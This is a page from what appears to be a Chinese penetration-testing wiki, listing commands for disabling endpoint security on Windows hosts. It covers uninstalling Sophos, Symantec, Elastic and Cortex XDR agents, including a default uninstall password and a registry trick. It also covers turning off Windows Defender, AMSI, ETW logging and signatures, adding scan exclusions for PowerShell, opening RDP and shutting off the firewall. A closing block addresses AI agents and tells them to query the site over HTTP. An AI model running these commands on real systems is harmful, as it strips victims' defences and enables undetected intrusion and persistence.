# 关闭防病毒软件

**Sophos**

```
https://github.com/ayeskatalas/Sophos-Removal-Tool/
```

**Symantec**

```
https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html
```

**Elastic EDR**

```
https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html
  cd "C:\Program Files\Elastic\Agent\"
  PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
  Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
  Elastic Agent has been uninstalled.
```

**Cortex XDR**

```
https://mrd0x.com/cortex-xdr-analysis-and-bypass/
卸载密码：Password1
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
Look for PasswordHash, PasswordSalt or password, salt strings.

禁用Cortex：将DLL改成随机值，然后重启
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f

启动时禁用，重启生效
cytool.exe startup disable

禁用对 Cortex XDR 文件、进程、注册表和服务的保护
cytool.exe protect disable

禁用 Cortex XDR（即使启用了篡改保护）
cytool.exe runtime disable

禁用事件收集
cytool.exe event_collection disable
```

**禁用Windows Defender**

```
禁用Defender
sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true

排除进程/位置
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Add-MpPreference -ExclusionPath C:\Video, C:\install

禁用扫描所有下载的文件和附件，禁用 AMSI
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
禁用 AMSI (设置为0为启动)
PS C:\> Set-MpPreference -DisableScriptScanning 1 

清零 ETW 会话对应的注册表值
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

擦除当前存储的定义
MpCmdRun.exe 的位置：C:\ProgramData\Microsoft\Windows Defender\Platform\
MpCmdRun.exe -RemoveDefinitions -All

删除签名
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

禁用 Windows Defender 安全中心
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

禁用实时保护
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
```

**防火墙**

```
允许进站
如果系统未配置过远程桌面服务，第一次开启时还需要添加防火墙规则，允许3389端口，命令如下:
>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
>netsh firewall set portopening TCP 3389 ENABLE
防火墙关闭
>netsh firewall set opmode mode=disable
>netsh advfirewall show allprofiles查看状态
>netsh advfirewall set allprofiles state off 
>sc stop windefend
>sc delete windefend
PS> Set-MpPreference -DisableRealtimeMonitoring 1
PS> Set-MpPreference -Disablearchivescanning $true
IP白名单
>New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress 10.10.10.10
列出防火墙的阻止端口
>$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
禁用防火墙
在 Windows 7 上通过 cmd 禁用防火墙
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server"  /v fDenyTSConnections /t REG_DWORD /d 0 /f

在 Windows 7 上通过 Powershell 禁用防火墙
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" –Value'`

通过 cmd 在任何windows上禁用防火墙
netsh firewall set opmode disable
netsh Advfirewall set allprofiles state off
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/quan-xian-wei-chi/windows/guan-bi-fang-bing-du-ruan-jian.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.